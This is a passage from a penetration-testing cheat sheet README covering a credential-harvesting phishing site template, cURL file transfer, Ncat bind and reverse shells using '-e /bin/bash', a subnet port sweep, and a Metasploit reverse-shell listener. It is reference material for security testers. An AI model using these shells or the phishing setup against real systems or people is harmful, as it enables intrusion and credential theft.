[\\\\social_engineering\\\\phishing_website\\\\](https://github.com/ivan-sincek/penetration-testing-cheat-sheet/tree/master/social_engineering/phishing_website) to your server's web root directory (e.g., to \\xampp\\htdocs\\ on XAMPP), and navigate to the web page with your preferred web browser.\n\nCaptured credentials will be stored in [\\\\social_engineering\\\\phishing_website\\\\logs\\\\credentials.log](https://github.com/ivan-sincek/penetration-testing-cheat-sheet/tree/master/social_engineering/phishing_website/logs).\n\n\u003cp align=\"center\"\u003e\u003cimg src=\"https://github.com/ivan-sincek/penetration-testing-cheat-sheet/blob/master/img/phishing_website.jpg\" alt=\"Phishing Website\"\u003e\u003c/p\u003e\n\n\u003cp align=\"center\"\u003eFigure 2 - Phishing Website\u003c/p\u003e\n\nRead the comments in [\\\\social_engineering\\\\phishing_website\\\\index.php](https://github.com/ivan-sincek/penetration-testing-cheat-sheet/blob/master/social_engineering/phishing_website/index.php) to get a better understanding of how it all works.\n\nYou can modify and expand this template to your liking. You have everything you need to get started.\n\nYou can easily customize the [CSS](https://github.com/ivan-sincek/penetration-testing-cheat-sheet/blob/master/social_engineering/phishing_website/css/main.css) to make it look more like the company you are testing, e.g., change colors, logo, etc.\n\nCheck the standalone redirect templates in the [\\\\social_engineering\\\\phishing_website\\\\redirects\\\\](https://github.com/ivan-sincek/penetration-testing-cheat-sheet/blob/master/social_engineering/phishing_website/redirects) directory.\n\nUse the SingleFile ([Chrome](https://chrome.google.com/webstore/detail/singlefile/mpiodijhokgodhhofbcjdecpffjipkle), [Firefox](https://addons.mozilla.org/hr/firefox/addon/single-file)) browser extension to download a web page as a single HTML file, then rename the file to `index.php`.\n\n## 7. 
Miscellaneous\n\nHere you can find a bunch of random stuff.\n\n### 7.1 Useful Websites\n\n* [jsonlint.com](https://jsonlint.com)\n* [base64decode.org](https://www.base64decode.org)\n* [urldecoder.org](https://www.urldecoder.org)\n* [bitly.com](https://bitly.com) - URL shortener\n* [getcreditcardnumbers.com](https://www.getcreditcardnumbers.com) - dummy credit card info\n\n### cURL\n\nDownload a file:\n\n```fundamental\ncurl somesite.com/somefile.txt -o somefile.txt\n```\n\nUpload a file:\n\n```fundamental\ncurl somesite.com/uploads/ -T somefile.txt\n```\n\n| Option | Description |\n| --- | --- |\n| -d | Sends the specified data in a POST request to the HTTP server |\n| -H | Extra header to include in the request when sending HTTP to a server |\n| -i | Include the HTTP response headers in the output |\n| -k | Proceed and operate server connections otherwise considered insecure |\n| -o | Write to file instead of stdout |\n| -T | Transfers the specified local file to the remote URL, same as PUT method |\n| -v | Make the operation more talkative |\n| -x | Use the specified proxy (\\[protocol://\\]host\\[:port\\]) |\n| -X | Specifies a custom request method to use when communicating with the HTTP server |\n\nFind out how to test a web server for various HTTP methods and method overrides at [ivan-sincek/forbidden](https://github.com/ivan-sincek/forbidden).\n\n### Ncat\n\n\\[Server\\] Set up a listener:\n\n```fundamental\nncat -nvlp 9000\n\nncat -nvlp 9000 \u003e received_data.txt\n\nncat -nvlp 9000 -e /bin/bash\n\nncat -nvlp 9000 -e /bin/bash --ssl\n\nncat -nvlp 9000 --ssl-cert crt.pem --ssl-key key.pem\n\nncat -nvlp 9000 --keep-open \u003c\u003c\u003c \"HTTP/1.1 200 OK\\r\\n\\r\\n\"\n```\n\n\\[Client\\] Connect to a remote host:\n\n```fundamental\nncat -nv 192.168.8.5 9000\n\nncat -nv 192.168.8.5 9000 \u003c sent_data.txt\n\nncat -nv 192.168.8.5 9000 -e /bin/bash\n\nncat -nv 192.168.8.5 9000 -e /bin/bash --ssl\n\nncat -nv 192.168.8.5 9000 --ssl-cert crt.pem --ssl-key 
key.pem\n```\n\nFind out how to create an SSL/TLS certificate at [ivan-sincek/secure-website](https://github.com/ivan-sincek/secure-website/tree/master/crt).\n\nCheck whether a connection to a specified TCP port (e.g., port 22 or 23) is possible:\n\n```bash\nfor i in {0..255}; do ncat -nv \"192.168.8.${i}\" 9000 -w 2 -z 2\u003e\u00261 | grep -Po '(?\u003c=Connected\\ to\\ )[^\\s]+(?=\\.)'; done\n\nfor ip in $(cat ips.txt); do ncat -nv \"${ip}\" 9000 -w 2 -z 2\u003e\u00261 | grep -Po '(?\u003c=Connected\\ to\\ )[^\\s]+(?=\\.)'; done\n```\n\n### multi/handler\n\nSet up a listener (change the PAYLOAD, LHOST, and LPORT as necessary):\n\n```fundamental\nmsfconsole -q\n\nuse exploit/multi/handler\n\nset PAYLOAD windows/shell_reverse_tcp\n\nset LHOST 192.168.8.185\n\nset LPORT 9000\n\nexploit\n```\n\n### ngrok\n\nUse [ngrok](https://ngrok.com/download) to give your local web server a public address, but, for security reasons, do not expose the web server for too long if it is not properly hardened.\n\nI advise you not to transfer any sensitive data over it, just in case.\n\n### Additional References\n\nCredits to the authors!\n\n* [book.hacktricks.xyz](https://book.hacktricks.xyz/welcome/readme)\n* [infosecmatter.com/bug-bounty-tips](https://www.infosecmatter.com/bug-bounty-tips)\n* [pentestbook.six2dez.com](https://pentestbook.six2dez.com)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fivan-sincek%2Fpenetration-testing-cheat-sheet","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fivan-sincek%2Fpenetration-testing-cheat-sheet","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fivan-sincek%2Fpenetration-testing-cheat-sheet/lists"}